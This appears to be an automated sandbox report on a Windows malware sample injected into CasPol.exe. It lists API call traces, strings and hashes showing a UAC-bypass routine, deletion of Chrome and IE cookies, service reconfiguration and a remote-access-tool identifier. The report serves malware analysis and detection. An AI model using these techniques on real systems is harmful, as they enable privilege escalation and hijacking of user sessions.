                                                                                                                  • Opcode ID: 2ba61fc1b2277f262010f0e17440aec044fc634041d42f3fb681f5f0ad845f97
                                                                                                                  • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                                                                                                                  • Opcode Fuzzy Hash: 2ba61fc1b2277f262010f0e17440aec044fc634041d42f3fb681f5f0ad845f97
                                                                                                                  • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                                  APIs
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00437B51
                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                  • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                  • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                                                                                                                  • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                  • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                    • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                    • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                  • API String ID: 1133728706-4073444585
                                                                                                                  • Opcode ID: a32d57285e98fe8185e522098f46dc5f38963afb01a16617e9d2f967551b33e0
                                                                                                                  • Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
                                                                                                                  • Opcode Fuzzy Hash: a32d57285e98fe8185e522098f46dc5f38963afb01a16617e9d2f967551b33e0
                                                                                                                  • Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 893373978a8f63a806f149930d37a519c5179eb32fa122ac40cbdb5ec79234b4
                                                                                                                  • Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
                                                                                                                  • Opcode Fuzzy Hash: 893373978a8f63a806f149930d37a519c5179eb32fa122ac40cbdb5ec79234b4
                                                                                                                  • Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
                                                                                                                  APIs
                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                                  • int.LIBCPMT ref: 0040FC0F
                                                                                                                    • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                    • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                  • String ID: p[G
                                                                                                                  • API String ID: 2536120697-440918510
                                                                                                                  • Opcode ID: 21b0a4efc7602d160aff57bcb0434e0537ff44c0ab5ab895835da1e08b7de2e9
                                                                                                                  • Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
                                                                                                                  • Opcode Fuzzy Hash: 21b0a4efc7602d160aff57bcb0434e0537ff44c0ab5ab895835da1e08b7de2e9
                                                                                                                  • Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                                                                                                                  • _free.LIBCMT ref: 0044FD39
                                                                                                                    • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                    • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                  • _free.LIBCMT ref: 0044FD44
                                                                                                                  • _free.LIBCMT ref: 0044FD4F
                                                                                                                  • _free.LIBCMT ref: 0044FDA3
                                                                                                                  • _free.LIBCMT ref: 0044FDAE
                                                                                                                  • _free.LIBCMT ref: 0044FDB9
                                                                                                                  • _free.LIBCMT ref: 0044FDC4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                  • Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
                                                                                                                  • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                  • Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                  • _free.LIBCMT ref: 100092AB
                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                  • _free.LIBCMT ref: 100092B6
                                                                                                                  • _free.LIBCMT ref: 100092C1
                                                                                                                  • _free.LIBCMT ref: 10009315
                                                                                                                  • _free.LIBCMT ref: 10009320
                                                                                                                  • _free.LIBCMT ref: 1000932B
                                                                                                                  • _free.LIBCMT ref: 10009336
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                  • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                  • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                  • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                  APIs
                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
                                                                                                                    • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                    • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                  • CoUninitialize.OLE32 ref: 0040688E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                  • API String ID: 3851391207-2637227304
                                                                                                                  • Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                                  • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                                  • Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                                  • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                                  APIs
                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                  • int.LIBCPMT ref: 0040FEF2
                                                                                                                    • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                    • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                  • String ID: h]G
                                                                                                                  • API String ID: 2536120697-1579725984
                                                                                                                  • Opcode ID: 8c8f0d1d08d765d4a28e06ad20e8fb44e6fb0a24af2cea39948b13a93e2f9581
                                                                                                                  • Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
                                                                                                                  • Opcode Fuzzy Hash: 8c8f0d1d08d765d4a28e06ad20e8fb44e6fb0a24af2cea39948b13a93e2f9581
                                                                                                                  • Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789
                                                                                                                  APIs
                                                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                  • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                  Strings
                                                                                                                  • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                  • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                  • UserProfile, xrefs: 0040B2B4
                                                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                  • API String ID: 2018770650-304995407
                                                                                                                  • Opcode ID: cce28e2294b529603f17114cb80ebac831a723e33fe1408caf9503476a799aea
                                                                                                                  • Instruction ID: 57831ae66bbe87b328e3caf482cfdb9a18bfb77b2c204d956758bc207329a0f7
                                                                                                                  • Opcode Fuzzy Hash: cce28e2294b529603f17114cb80ebac831a723e33fe1408caf9503476a799aea
                                                                                                                  • Instruction Fuzzy Hash: ED01A23164410557CB0477B5DD6B8AF3624ED50708F60013FF802B22E2FE3A9A0586CE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Rmc-B3IX49$BG
                                                                                                                  • API String ID: 0-2803776138
                                                                                                                  • Opcode ID: b400c12b05c9e5cfb729653fd7a91a891c92a570d8021ffcb9c35e87f5e75d17
                                                                                                                  • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                                  • Opcode Fuzzy Hash: b400c12b05c9e5cfb729653fd7a91a891c92a570d8021ffcb9c35e87f5e75d17
                                                                                                                  • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                  • String ID: CorExitProcess$h(RA/$mscoree.dll
                                                                                                                  • API String ID: 4061214504-2147307258
                                                                                                                  • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                  • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                  • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                  • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                  APIs
                                                                                                                  • __allrem.LIBCMT ref: 00439799
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                                                                                                                  • __allrem.LIBCMT ref: 004397CC
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                                                                                                                  • __allrem.LIBCMT ref: 00439801
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1992179935-0
                                                                                                                  • Opcode ID: 90d3cbeaf7f932440d57ef5c22d3b8f6324572cbadffe2a0eaa56fc6fd551e6e
                                                                                                                  • Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
                                                                                                                  • Opcode Fuzzy Hash: 90d3cbeaf7f932440d57ef5c22d3b8f6324572cbadffe2a0eaa56fc6fd551e6e
                                                                                                                  • Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: __cftoe
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4189289331-0
                                                                                                                  • Opcode ID: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                                                                                  • Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
                                                                                                                  • Opcode Fuzzy Hash: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                                                                                  • Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D
                                                                                                                  APIs
                                                                                                                  • _strlen.LIBCMT ref: 10001607
                                                                                                                  • _strcat.LIBCMT ref: 1000161D
                                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                  • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1922816806-0
                                                                                                                  • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                  • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                  • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                  • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                  APIs
                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3594823470-0
                                                                                                                  • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                  • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                  • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                  • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                  APIs
                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
                                                                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 493672254-0
                                                                                                                  • Opcode ID: 278cd7c7b1e512cd1ff2c1b40676ad723d9eb82b7f9a8c909b76352d7357707f
                                                                                                                  • Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
                                                                                                                  • Opcode Fuzzy Hash: 278cd7c7b1e512cd1ff2c1b40676ad723d9eb82b7f9a8c909b76352d7357707f
                                                                                                                  • Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
                                                                                                                  • SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
